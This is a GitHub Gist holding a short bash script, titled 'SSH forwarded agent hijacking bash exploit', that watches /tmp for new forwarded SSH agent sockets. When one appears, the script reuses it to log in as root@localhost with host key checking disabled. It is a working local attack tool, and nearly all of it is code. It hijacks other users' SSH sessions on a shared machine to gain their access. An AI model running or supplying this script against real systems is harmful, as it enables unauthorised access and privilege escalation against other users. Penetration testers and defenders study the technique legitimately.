Last active
June 26, 2023 15:15
-
-
Save LucasVanHaaren/22ed17ebb24c977b1bb56b819bf09a08 to your computer and use it in GitHub Desktop.
SSH forwarded agent hijacking bash exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Simple portable bash script to exploit insecure forwarded SSH agent | |
| # When agent_forwarding is enabled, this allows every local user which | |
| # has access to the ssh agent's dir (commonly /tmp) to hijack other ssh sessions | |
| # | |
| # See more about this technique on https://book.hacktricks.xyz/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation | |
| # Defaults values to watch (/tmp dir, every second, can be overrided by cmdline args) | |
| AGENT_DIR="${1:-/tmp}" | |
| POLLING="${2:-1}" | |
| # Starts directory watching for new agent creation | |
| files_count=`ls $AGENT_DIR | wc -l` | |
| echo "[+] Watching $AGENT_DIR folder for new entries every $POLLING second..." | |
| while [[ true ]] | |
| do | |
| if [[ `ls $AGENT_DIR | wc -l` -gt $files_count ]]; then | |
| dir=`ls $AGENT_DIR | head -n 1` | |
| file=`ls $AGENT_DIR/$dir` | |
| path="$AGENT_DIR/$dir/$file" | |
| echo "[-] Trying to hijack $path SSH session ..." | |
| SSH_AUTH_SOCK=$path ssh -o StrictHostKeyChecking=no root@localhost | |
| break | |
| fi | |
| sleep $POLLING | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment